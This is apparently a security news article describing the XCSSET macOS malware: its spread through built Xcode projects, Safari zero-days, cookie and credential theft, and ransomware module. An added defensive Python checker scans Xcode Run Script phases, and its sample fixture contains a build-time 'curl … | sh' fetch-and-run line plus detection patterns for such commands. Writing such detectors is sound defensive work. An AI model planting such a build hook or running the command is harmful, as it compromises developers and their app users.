
XCSSET Malware

The researchers at Trend Micro reported a new malware family that exploits Xcode and can lead to a "rabbit hole" of malware payloads. The threat, named XCSSET, shows a rather ingenious idea on the part of the attackers: instead of infecting individual users, the malware burrows inside developers' Xcode projects, from where it can be delivered in supply-chain-style attacks.

Xcode is Apple's free IDE (Integrated Development Environment) for macOS and is used to develop many applications for the Apple ecosystem. Although the exact method has not been uncovered, XCSSET modifies the affected Xcode project so that malicious code runs whenever the project is built. This means developers would unwittingly spread the infection to their own users. Some developers have already uploaded compromised Xcode projects to GitHub.

The XCSSET Malware Exploits Two Safari Vulnerabilities

Once triggered on the victim's device, XCSSET targets the Safari browser through two previously unknown vulnerabilities. The first zero-day is a way to bypass System Integrity Protection (SIP), which protects the Safari cookies file at /Library/Cookies/Cookies.binarycookies, via an SSHD process. The second zero-day concerns the developer build of Safari WebKit: it lets XCSSET circumvent WebKit's password prompt and perform dangerous operations without user approval. Dylib hijacking is also possible.

If XCSSET is successful, it can wreak havoc thanks to the multitude of features it possesses. It can read and dump Safari cookies and use them to carry out UXSS (Universal Cross-Site Scripting) attacks by injecting malicious JavaScript code into the web pages the browser displays. This opens nearly limitless possibilities for the attackers: they can manipulate and replace Bitcoin and other cryptocurrency wallet addresses, collect credit card information linked to the Apple Store, and harvest credentials from Google Chrome, Yandex, Apple ID, PayPal and others. Sensitive information can also be exfiltrated from additional applications such as Skype, WeChat, QQ and Telegram. XCSSET also contains a ransomware module with file encryption capabilities and a ransom note.

Researchers have detected 380 IP addresses of users infected with XCSSET. Of these, 152 belonged to users in China, followed by 103 victims in India.

Infection Vectors

The reason XCSSET can be said to target app developers is that its main infection vector is Xcode projects. The user has to download an infected project, open it and build it for XCSSET to infiltrate the system. The other vector XCSSET can use to propagate is modified apps, which lets it spread to systems that do not have Xcode installed.
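As an added example (not from this page or from Trend Micro's report), here is a small Python checker for the vector described above: it pulls every Run Script build phase out of a project.pbxproj, the mechanism by which an Xcode project runs shell commands at build time, and flags scripts that look like a build-time execution hook. The sample project fragment and the heuristics are constructed assumptions for this example, not published XCSSET indicators.

```python
import re

# Constructed fragment of a project.pbxproj (OpenStep plist syntax) with two
# "Run Script" build phases. The second is the kind of hook an attacker could
# plant so the project executes code every time a developer builds it.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
    A1 /* Lint */ = {
        isa = PBXShellScriptBuildPhase;
        shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
    };
    B2 /* Assets */ = {
        isa = PBXShellScriptBuildPhase;
        shellScript = "\"$SRCROOT/.build/assets\" & curl -s http://203.0.113.5/x | sh\n";
    };
/* End PBXShellScriptBuildPhase section */
'''

# Review heuristics (assumptions for this example, not published XCSSET indicators).
SUSPICIOUS = [
    ("hidden path component", re.compile(r'/\.[A-Za-z0-9_]')),
    ("download piped to interpreter",
     re.compile(r'\b(curl|wget)\b.*\|\s*(sh|bash|zsh|python\d?|osascript)\b')),
    ("encoded or evaluated payload", re.compile(r'\b(base64|eval|xxd)\b')),
]
# One pbxproj object: "<id> /* comment */ = { ... };" (script phases have no nested dicts).
_OBJECT_RE = re.compile(r'(?P<id>[0-9A-F]+)\s*(?:/\*.*?\*/)?\s*=\s*\{(?P<body>.*?)\};', re.S)
_SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)";', re.S)

def extract_run_scripts(pbxproj: str) -> dict:
    """Return {object id: shell text} for every PBXShellScriptBuildPhase in the file."""
    scripts = {}
    for m in _OBJECT_RE.finditer(pbxproj):
        body = m.group("body")
        if "isa = PBXShellScriptBuildPhase;" not in body:
            continue
        s = _SCRIPT_RE.search(body)
        if s:
            # Undo the plist string escapes (\" and \n) to recover the real shell text.
            scripts[m.group("id")] = s.group(1).encode().decode("unicode_escape")
    return scripts

def flag_run_scripts(pbxproj: str) -> dict:
    """Map each build phase id to the heuristic labels its script matches."""
    findings = {}
    for obj_id, script in extract_run_scripts(pbxproj).items():
        hits = [label for label, rx in SUSPICIOUS if rx.search(script)]
        if hits:
            findings[obj_id] = hits
    return findings
```

Run flag_run_scripts() over the contents of App.xcodeproj/project.pbxproj of any project pulled from a third-party repository before the first build; a Run Script phase you did not expect deserves a full read before you press Build.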


The most probable reason for deliberately targeting developers is that, in theory, XCSSET can spread through the apps of any developer whose system has been infected. If a prolific developer were infected, their apps could become a significant stream of new infections, providing XCSSET's operators with potentially thousands of additional victims. XCSSET has many of the capabilities one would expect from a trojan. It installs a trojanized version of Safari, or of whatever Mac browser the victim uses, which injects malicious code into the pages the victim visits. Since that code is received from a C2 server and is not fixed, the criminals have almost endless options for manipulating the victim's browsing sessions. One thing XCSSET will do is try to steal the victim's credentials for Google, PayPal, Apple and other services. The browser can also replace cryptocurrency addresses in pages, so XCSSET can, at least in theory, facilitate the theft of cryptocurrencies. Another focus of XCSSET is note-taking apps and messengers, including WeChat, Telegram and Skype as well as Apple Notes and Evernote.

It is not clear how successful XCSSET has been so far. At this point, most security solutions for Mac should be able to detect and remove it. However, since its primary targets are developers, who can unknowingly spread XCSSET through their apps, it may linger for a long time.
